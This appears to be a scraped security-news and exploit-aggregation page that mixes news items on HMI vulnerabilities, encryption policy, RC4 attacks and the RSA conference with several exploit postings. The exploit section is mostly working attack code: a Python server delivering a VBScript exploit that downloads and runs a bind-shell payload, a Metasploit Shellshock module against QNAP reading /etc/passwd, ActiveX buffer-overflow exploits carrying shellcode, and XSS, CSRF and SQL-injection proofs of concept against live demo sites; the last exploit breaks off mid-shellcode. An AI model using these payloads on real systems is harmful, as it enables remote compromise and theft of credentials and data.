Aerosol

Diaphora, a program diffing plugin for IDA (by joxeankoret) https://github.com/joxeankoret/diaphora Source

Au inceput chineji sa atace tot ce prind 2 stiri asemanatoare sunt: GitHub hit by Massive DDoS Attack From China - Hacker News https://threatpost.com/github-hit-with-ddos-attack/111850

There are a series of vulnerabilities related to credentials and authentication in two of Schneider Electric’s HMI products, and an attacker who exploits them may be able to run arbitrary code. The bugs lie in Schneider’s InduSoft Web Studio and InTouch Machine Edition products, both of which are embedded human-machine interface software packages. The applications are used for energy management operations in a number of industries, including IT, food and agriculture and energy. There are several vulnerabilities in each of the packages, and an advisory from ICS-CERT says that public exploits for some of them may be circulating. One of the vulnerabilities results from the fact that the apps use a hard-coded, cleartext password to protect sensitive information that’s stored in Project Files and Project Configuration Files. Another bug is related to the authentication method used to connect to servers from the affected apps. “When connecting to server from HMI, available user names are presented to the screen allowing for potential brute force attacks,” the advisory says. The other two vulnerabilities derive from the fact that the applications send user credentials in cleartext and the credentials also are stored in the clear. These bugs could allow an attacker easy access to a target system. Schneider Electric has released patches for the vulnerabilities in both InduSoft Web Studio and InTouch Machine Edition 2014 and encourages customers to install them as soon as possible. Source

In a House Appropriations subcommittee hearing this morning on the FBI budget for the upcoming fiscal year, FBI Director James Comey was again critical of new encryption features from Apple and Google that he claims would make it impossible for law enforcement to access the contents of mobile device communications. This is not the first time the U.S. law enforcement and intelligence-gathering community has aired this complaint. Last month, NSA director Mike Rogers hit similar talking points at a New America Foundation event in D.C., calling on Congress to draft legislation providing a legal framework accessing encrypted communications. Comey claimed encryption was leading us to “a very, very dark place” in October of last year. The concerns follow announcements from Apple and Google that they deployed encryption for which not even they had the keys back in October. Today though, Congress got involved. “The new iPhone 6’s have an encryption in it that you can’t get in to and there is no backdoor key,” said Rep. Robert Aderholt (R-AL) as he reached into his pocket and pulled out his iPhone. “This is different from their predecessors. Their other phones you were able to get into. What is the FBI’s position on Google and Apple’s decision to encrypt these smart phones?” Comey replied that this reality was a huge problem for law enforcement because these new encryption implementations would make it impossible for law enforcement to execute court ordered warrants where phones were locked and communications data encrypted. “We’re drifting toward a place where a whole lot of people are going to be looking at us with tears in their eyes,” Comey argued, “and say ‘What do you mean you can’t? My daughter is missing. You have her phone. What do you mean you can’t tell me who she was texting with before she disappeared?” Comey went on to assure the attending members of Congress that he wasn’t seeking backdoors. He said he wants a way to access the content and communications data belonging to the subjects of criminal investigations after obtaining a warrant. Comey claims that local law enforcement officials around the country are very concerned, because, they claim, mobile communications content play an integral various investigations. While Comey was unable to quantify the effect of encryption technologies on FBI investigatory work, he did claim that it has become an obstacle in a massive amount of cases, saying it would only become more of a problem moving forward. “I’ve heard tech executives say privacy should be the paramount virtue,” Comey said. “When I hear that, I close my eyes and say, ‘Try to imagine what that world looks like where pedophiles can’t be seen, kidnappers can’t be seen, drug dealers can’t be seen.'” Rep. Aderholt then asked Comey what he needs from Congress in order to address the problem. Comey acknowledged that the issue is a complex one, but ultimately that the only reasonable fix would be a legislative one and not a financial one. “If you want to do business in this country,” Comey warned, “then you’re not going to be allowed to create spaces that are beyond the reach of the law.” Rep. John Carter (R-TX) wondered how companies are able to encrypt phones in such a way that their contents cannot be accessed while also getting compromised by attacks. “Cyber is just pounding me from every direction, and every time I hear something or something pops into my head, because I don’t know anything about this stuff, [but] if they can do that to a cell phone then why can’t they do that to a computer so no one can get into it,” Carter reasoned. “If that’s the case, then isn’t that a solution to the invaders from around the world trying to get in here?” Somehow Carter reigned in his stream of thought and brought it back to the point at hand, suggesting to his colleagues that encrypted smartphones were the perfect tool for lawlessness and in fact a violation of the Fourth Amendment, which allows for lawful search and seizure under warrant. In an attempt to make sense of the issue, the Representatives explained to one another that no safe in the world is unbreakable, so how is it legal that there could be encryption that is not accessible. They seemed to agree that the analogy was a valid one, though it some would argue that a safe and a cell phone are in reality nothing alike. On that note, Rep. Michael Honda (D-CA) suggested that potential legislation seeking access to phone data may be more akin to laws governing access to the content of a suspect’s own mind than to laws dealing with physical access. He contended that some sort of force of law compelling suspects to testify or disclose the information to access their phone under threat of contempt could be another way to work around encryption. Source

Until yesterday, a popular networking library for iOS and OS X used in apps such as Pinterest and Simple was susceptible to SSL man-in-the-middle (MiTM) attacks. The developer behind the framework AFNetworking on Thursday pushed a fix for the issue, a logic flaw. The flaw had lingered in the wild for more than two months but it took some repeated poking from Github users and two researchers, Simone Bovi and Mauro Gentile at the software security firm Minded Security, for the developer to finally address it. Bovi and Gentile stumbled upon the issue while doing mobile application security analysis for one of their clients in early March. After combing through the application’s source code the researchers found that the library’s SSL certification validation and its trust evaluation had been disabled, something that could have allowed any SSL traffic to be intercepted via a proxy service such as Burp Suite. “After a few minutes, we figured out that there was a logical bug while evaluating trust for SSL certificates, whose consequence was to completely disable SSL certificate validation,” Bovi wrote in a blog post yesterday, shortly before the issue was fixed. Bovi and Gentile found the issue had previously been brought up in a Github forum post in early February and that the flaw appeared to stem from a problem with version 2.5.1 of the library, introduced in late January. An additional, and more thorough post on Github 15 days ago helped the issue gain some visibility as well. “I have verified that a malicious proxy server can sniff all the contents of HTTPS communication in this case,” Github user duttski, who created a patch as a temporary workaround until the issue was fixed, warned at the time. iOS developer Mattt Thompson, who created and maintains AFNetworking, pushed Version 2.5.1 of the project live yesterday and fixed the issue by adding test and implementation of strict default validation, according to the library’s release notes. The library is a key part of popular social media applications like Vine and Pinterest on OS X and iOS. The framework also figures into apps and services primarily used by app and UX developers like Heroku and Parse. Source

Apple, Microsoft, Facebook, Google, Yahoo! – and many, many others – have appealed to American politicians and g-men to rein in mass digital surveillance this May, and bring the intelligence community under some kind of effective oversight. "It has been nearly two years since the first news stories revealed the scope of the United States’ surveillance and bulk collection activities," the group wrote in an open letter to President Obama, congressional leaders, and the heads of the NSA and US Department of Justice. "Now is the time to take on meaningful legislative reforms to the nation’s surveillance programs that maintain national security while preserving privacy, transparency, and accountability." And, presumably, prevent future annoying headlines like this and this appearing on the web. The tech goliaths are members of the Reform Government Surveillance coalition, along with pro-privacy and civil-rights warriors. The group has been piling on the pressure over global spying, which they say hurts their business. In their latest open letter, the gang call for reform of the USA PATRIOT Act, which is up for renewal shortly. On May 31 this year, Section 215 of the act (or to give it its full and faintly ridiculous name, the Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act) expires. Section 215 is the part of the anti-terror law that the NSA uses to justify snooping on everyone's phone metadata. The group is pressing that the section be allowed to expire on June 1 without being reauthorized. Section 214, which covers pen registers and trap and trace devices, will also expire on that date. The group says that if they are renewed, proper oversight is needed by an independent third party. With the sections of the Patriot Act coming up for renewal, there's an increasing amount of pressure to curb the blanket spying revealed by whistleblower Edward Snowden. Earlier this week, a bipartisan bill was introduced into the US House of Representatives to abolish the PATRIOT Act altogether, but El Reg suspects Satan will go to work on a snowplow before it passes. Source

The organizers of this year's RSA security conference have made at least one thing clear to exhibitors: no booth babes. The industry shindig has sent out a new dress code banning scantily clad models, regardless of gender, from wandering the show floor. The rules dictate that exhibitors cannot wear shorts, tank tops and halter tops, miniskirts or tops that show "excessive cleavage." Lycra body suits are also out, as are "objectionable or offensive" costumes. Anyone breaking the rules will be thrown out of the four-day conference, due to kick off on April 20 in San Francisco, California. The rules apply to men, though we doubt it will have much of an impact; male booth, er, hunks are few and far between. Flocks of buxom young ladies handing out fliers and posing for photos is an all-too depressing sight at tech conferences. he hiring of booth babes is coming under fire more and more, with critics arguing that the practice is sexist, insulting, and encourages harassment of attendees and exhibitors who are women. A number of prominent trade shows, most notably the Shanghai Auto Show, have issued similar rules banning exhibitors from dressing booth staff in revealing clothing. The RSA conference usually has relatively far fewer booth babes than most conferences due to its decidedly enterprise focus. With the new rules in place, the practice will likely be all but eliminated, forcing exhibitors to rely on the good looks and charm of their own staff or PR agency. Source

The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols. Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream. It required attackers to view more than 17 billion (234) separate encryptions of the same data. That was a high bar, particularly given that the attack revealed only limited amounts of plaintext. Still, since the researchers demonstrated the attack could decrypt HTTPS-protected authentication cookies used to access user e-mail accounts, Google and other website operators immediately took notice. Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (226) encryptions, a two-order of magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail. Bar-mitzvah attack A second exploit targeting RC4 was devised by researchers from security firm Imperva and was presented Thursday at the Black Hat security conference in Singapore. The attack uses new ways to exploit the "invariance weakness," a key pattern in RC4 keys that can leak plaintext data into the ciphertext under certain conditions. The weakness first came to light in 2001, and led to the fatal exploit against wired equivalent privacy technology used to encrypt Wi-Fi networks. Given the age of the invariance weakness, Imperva researchers are dubbing their new exploit the "bar-mitzvah attack." "The security of RC4 has been questionable for many years, in particular its initialization mechanisms," Imperva researchers wrote in a research paper that accompanied Thursday's Blackhat talk. "However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [the 2013 RC4 researchers] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated." The bar-mitzvah attack requires adversaries to sample about one billion RC4 encryptions to infer a credit card number, password, or authentication cookie key. The known weakness exploited involves a flaw found in one out of every 16 million (224) RC4 keys that leads to "structures" in the "least significant bits" of the keystream. The attack is subject to a significant limitation, however, since the leaky plaintext is contained only in the first 100 bytes of ciphertext. Despite the limitation and the challenge of sampling so many encryptions, the attack may be enough to drastically reduce the cost of doing an exhaustive attack that guesses passwords, credit card numbers or similar data. Rather than try every possible combination, the bar-mitzvah attack allows attackers to hone in on a much smaller number of candidates. The growing body of attacks that defeat SSL and TLS encryption are only one threat facing the system millions of Internet users rely on to encrypt sensitive data and authenticate servers. In 2011 hackers broken into Netherlands-based certificate authority DigiNotar and minted counterfeit credentials for Google and other sensitive Web properties. Earlier this week, shoddy practices at an intermediate CA known as MCS Holdings, allowed its customers to obtain unauthorized certificates for several Google addresses. Poor practices on the part of Microsoft also led to the discovery of misissued certificates, on two separate occasions. “RC4 must die” The TLS protocol has two significant phases. The first "handshaking" phase uses asymmetric encryption to negotiate the symmetric encryption keys to be used by an e-mail or Web server and the connecting end user. During the later "record" phase, the parties use the agreed-upon keys to encrypt data using either the AES block cipher or RC4 stream cipher. The two attacks unveiled this month, combined with the exploit disclosed in 2013, are a strong indication the security of RC4 can't be counted on for much longer and should be phased out in favor of alternative algorithms. Retiring RC4 is proving a challenging proposition. A 2011 attack known as BEAST—short for Browser Exploit Against SSL/TLS—targets an encryption mode known as CBC, or cipher block chaining, which is present in most algorithms except for RC4. After BEAST was demonstrated to pose a credible threat to TLS-protected data in transit many security experts recommended website operators opt for RC4 to blunt the threat. That advice is no longer sound, now that RC4 is under attack, too. Imperva researchers say Web app developers should strongly consider disabling RC4 in all their TLS configurations and tech-savvy end uses should disable RC4 in their Browser settings. In February, the Internet Engineering Task Force submitted a request for comments prohibiting the use of RC4 cipher. Use of RC4 has shrunk from about half of all TLS traffic in 2013 to about 30 percent today, but eliminating it altogether may take years. Hanging in the balance, is the security and confidentiality of millions of Internet users. "RC4 was already looking nervously towards the cliff-edge," Kenny Paterson, a Royal Holloway, University of London professor who helped author last week's research, as well as the 2013 research it built on, wrote in a blog post published last week. "Our work pushes RC4 a significant step closer, leaving it teetering on the brink of oblivion for SSL/TLS. After all, attacks can only get better…" Source

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches. Changes: Added support for filter_wrapup callback. Various bug fixes, a typo fixed, and all perl function prototypes removed. Download Site: MIMEDefang | MIMEDefang

Hi Team, #Affected Vendor: http://lcms.chamilo.org/ #Date: 27/03/2015 #Discovered by: Joel Vadodil Varghese #Type of vulnerability: Persistent XSS #Tested on: Windows 7 #Product: LCMS Connect #Version: 4.1 #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. Chamilo LCMS connect is vulnerable to stored xss vulnerability. The parameter "site_name" is the vulnerable parameter which will lead to its compromise. #Proof of Concept (PoC): ------------------------ site_name=<img src="" onerror="alert('XSS')"/> -- Regards, *Joel V* Source

Hi Team, #Affected Vendor: http://lcms.chamilo.org/ #Date: 27/03/2015 #Discovered by: Joel Vadodil Varghese #Type of vulnerability: XSRF #Tested on: Windows 7 #Product: LCMS Connect #Version: 4.1 #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. The application is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages he could control the user's actions. #Proof of Concept (PoC): ------------------------------------ <form method="POST" name="form1" action=" http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem "> <input type="hidden" name="parent" value="0"/> <input type="hidden" name="title[de]" value=""/> <input type="hidden" name="title[en]" value="tester"/> <input type="hidden" name="title[fr]" value=""/> <input type="hidden" name="title[nl]" value=""/> <input type="hidden" name="application" value="weblcms"/> <input type="hidden" name="submit_button" value="Create"/> <input type="hidden" name="_qf__item" value=""/> <input type="hidden" name="type" value="core\menu\ApplicationItem"/> </form> -- Regards, *Joel V* Source

Hi Team, #Affected Vendor: http://lcms.chamilo.org/ #Date: 27/03/2015 #Discovered by: Joel Vadodil Varghese #Type of vulnerability: Clickjacking #Tested on: Windows 7 #Product: LCMS Connect #Version: 4.1 #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. LCMS connect is susceptible to clickjacking attack. #Proof of Concept (PoC): ------------------------------------ <iframe src="http://localhost/Chamilo/" sanboxed width=900 height=900> Please check me out !!!! </iframe> -- Regards, *Joel V* Source

#!/usr/bin/python import BaseHTTPServer, sys, socket ## # Acunetix OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7 # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record # Target Login Sequence # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/ # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # And Finally You Can Connect To Victim Machine Using Netcat # Usage: # chmod +x acunetix.py # ./acunetix.py # Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix # nc 192.168.1.7 333 # Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe # # Video: https://vid.me/SRCb ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/acunetix.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("acunetix.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\ 'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close() Source

# Affected software: CMS Builder v2.07 # Type of vulnerability: sql injection # URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php # Discovered by: Provensec # Website: http://www.provensec.com #versionv2.07 # Proof of concept http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payload demo:-> http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27y MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-25' at line 9 Source

# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; #{datastore['CMD']}" }) if res.body.empty? print_error("No data found.") elsif res.code== 302 print_status("#{rhost}:#{rport} - bash env variable injected") puts " " print_line(res.body) end end end Source

<html> <title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title> <!-- # Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day) # Google Dork: [if relevant] (we will automatically add these to the GHDB) # Date: 27th March, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 # Version: WinRDS 2.0.8 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2094 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Vulnerable Product = WinRDS 2.0.8 Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'> </object> <script> var buff1 = ""; var nops = ""; var buff2 = ""; for (i=0;i<128; i++) { buff1 += "B"; } nseh = "\xeb\x08PD"; //pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0 var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; ssac.StopSiteAllChannel(fbuff); </script> </html> Source

<html> <!-- # Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day) # Date: 26th MArch, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: 1, 6, 42, 0 # Tested on: Windows XP SP3 (IE6/7/8) # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll" prototype = "Sub LoadImage ( ByVal bstrFullPath As String )" memberName = "LoadImage" progid = "WESPMONITORLib.WESPMonitorCtrl" argCount = 1 For full analysis of the exploit refer http://blog.disects.com/2015/03/webgate-edvr-manager.html --> <object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'> </object> <script> var arg1 = ""; nops = ""; var buff = ""; for(i=0;i<268;i++) { arg1 += "B"; } nseh = "\xeb\x10\x90\x90"; //jmp over addr seh = "\x71\x47\x01\x10"; //pop pop ret addr document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>"); for(i=0;i<200;i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + 